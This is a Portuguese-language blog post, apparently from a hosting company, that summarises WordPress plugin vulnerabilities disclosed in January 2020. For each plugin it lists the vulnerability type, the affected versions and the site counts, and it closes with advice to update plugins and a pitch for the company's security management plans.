Estamos anexando uma visão geral das vulnerabilidades e notícias relacionadas ao WordPress recentemente publicadas. 
Em janeiro, vimos mais de 23 plugins vulneráveis que apresentam vulnerabilidades que afetam mais de 1,4 milhão de sites.

Se você estiver usando algum dos plug-ins mencionados, precisará atualizá-los para a versão mais recente o mais rápido possível e nunca esquecer de usar plugins ReCAPTHA  para evitar spam e boots em seus formulários.

Os sites hospedados nos servidores da HOST CURITIBA instalado estão protegidos contra os problemas de segurança, porém você desenvolvedor deve atualizar seus addons e instalar recaptha para seus formulários. precisa de um plano de gerenciamento de segurança? nós faremos as atualizações necessárias mensalmente. consulte os planos de gerenciamento.

DOM Cross-Site Scripting in Chatbot with IBM Watson Plugin

Vulnerability type: DOM-based XSS

Vulnerable version: 0.8.21 and below

Number of sites affected: 2 000+

--------------------------------------

Authenticated Stored Cross-Site Scripting Issue in Contextual Adminbar Color Plugin

Vulnerability type: Authenticated stored cross-site scripting issue

Vulnerable version: 0.3 and below

Number of sites affected: 40+

--------------------------------------

Authenticated Arbitrary Plugin Deactivation in 2J SlideShow Plugin

Vulnerability type: Authenticated arbitrary plugin deactivation

Vulnerable version: 1.3.40 and below

Number of sites affected: 3 000+

--------------------------------------

Broken Authentication Leading To Unauthenticated Stored XSS in Batch-Move Posts Plugin

Vulnerability type: Broken authentication leading to unauthenticated stored XSS

Vulnerable version: 1.5 and below

Number of sites affected: N/A

--------------------------------------

CSRF to XSS in Marketo Forms and Tracking Plugin

Vulnerability type: CSRF to XSS

Vulnerable version: 1.0.2 and below

Number of sites affected: N/A

--------------------------------------

Reflected XSS in Chained Quiz Plugin

Vulnerability type: Reflected XSS

Vulnerable version: 1.1.8.2 and below

Number of sites affected: 1 000+

--------------------------------------

Multiple Vulnerabilities in WP Database Reset Plugin

Vulnerability type: Unauthenticated database reset

Vulnerable version: 3.1 and below

Number of sites affected: 80 000+

--------------------------------------

Vulnerability type: Privilege escalation

Vulnerable version: 3.1 and below

Number of sites affected: 80 000+

--------------------------------------

Reflected Cross-Site Scripting in LearnDash Plugin

Vulnerability type: Reflected cross-site Scripting (XSS) issue on the [ld_profile] search field

Vulnerable version: fixed in version 3.1.2

Number of sites affected: N/A

--------------------------------------

Authenticated Stored XSS in Video on Admin Dashboard

Vulnerability type: Authenticated stored XSS

Vulnerable version: fixed in version 1.1.4

Number of sites affected: 40+

--------------------------------------

Authenticated Stored XSS in Computer Repair Shop Plugin

Vulnerability type: Authenticated stored XSS

Vulnerable version: fixed in version 2.0

Number of sites affected: 40+

--------------------------------------

CSV Injection in TablePress Plugin

Vulnerability type: CSV injection

Vulnerable version: 1.10 and below

Number of sites affected: 800 000+

--------------------------------------

CSV Injection in WooCommerce – Store Exporter Plugin

Vulnerability type: CSV injection

Vulnerable version: 2.4 and below

Number of sites affected: 20 000+

--------------------------------------

Authentication Bypass in Backup and Staging by WP Time Capsule

Vulnerability type: Authentication bypass

Vulnerable version: 1.21.16 and below

Number of sites affected: 20 000+

--------------------------------------

Authentication Bypass in InfiniteWP Client Plugin

Vulnerability type: Authentication bypass

Vulnerable version: 1.9.4.5 and below

Number of sites affected: 300 000+

--------------------------------------

Multiple Vulnerabilities Patched in Minimal Coming Soon & Maintenance Mode – Coming Soon Page Plugin

Vulnerability type: CSRF to Stored XSS and Setting Changes

Vulnerable version: 2.15 and below

Number of sites affected: 80 000+

Vulnerability type: Insecure permissions: enable and disable maintenance mode

Vulnerable version: 2.15 and below

Number of sites affected: 80 000+

--------------------------------------

Multiple CSRF & XSS in Ultimate Auction Plugin

Vulnerability type: Multiple CSRF & XSS

Vulnerable version: 4.0.6 and below

Number of sites affected: 3 000+

--------------------------------------

Authenticated Code Injection in ElegantThemes (Divi, Extra, Divi-Builder)

Vulnerability type: Authenticated code injection

Vulnerable version: 4.0.10 and below

Number of sites affected: N/A

--------------------------------------

CSRF to XSS in WooCommerce Conversion Tracking Plugin

Vulnerability type: CSRF to XSS

Vulnerable version: 2.0.5 and below

Number of sites affected: 20 000+

--------------------------------------

Post Submission Spoofing & Stored XSS in Postie Plugin

Vulnerability type: Post submission spoofing & stored XSS

Vulnerable version: 1.9.40 and below

Number of sites affected: 20 000+

--------------------------------------

Unauthorized Authenticated Users Export in Import Users From CSV with Meta

Vulnerability type: Unauthorised authenticated users export

Vulnerable version: 1.15

Number of sites affected: 30 000+

--------------------------------------

Unauthenticated Reflected XSS in Ultimate FAQ Plugin

Vulnerability type: Unauthenticated reflected XSS

Vulnerable version: 1.8.30 and below

Number of sites affected: 40 000+

--------------------------------------

Arbitrary API Key update via CSRF in WP Simple Spreadsheet Fetcher For Google Plugin

Vulnerability type: Arbitrary API key update via CSRF

Vulnerable version: 0.3.7 and below

Number of sites affected: about 10

--------------------------------------



Terça, Janeiro 21, 2020

Voltar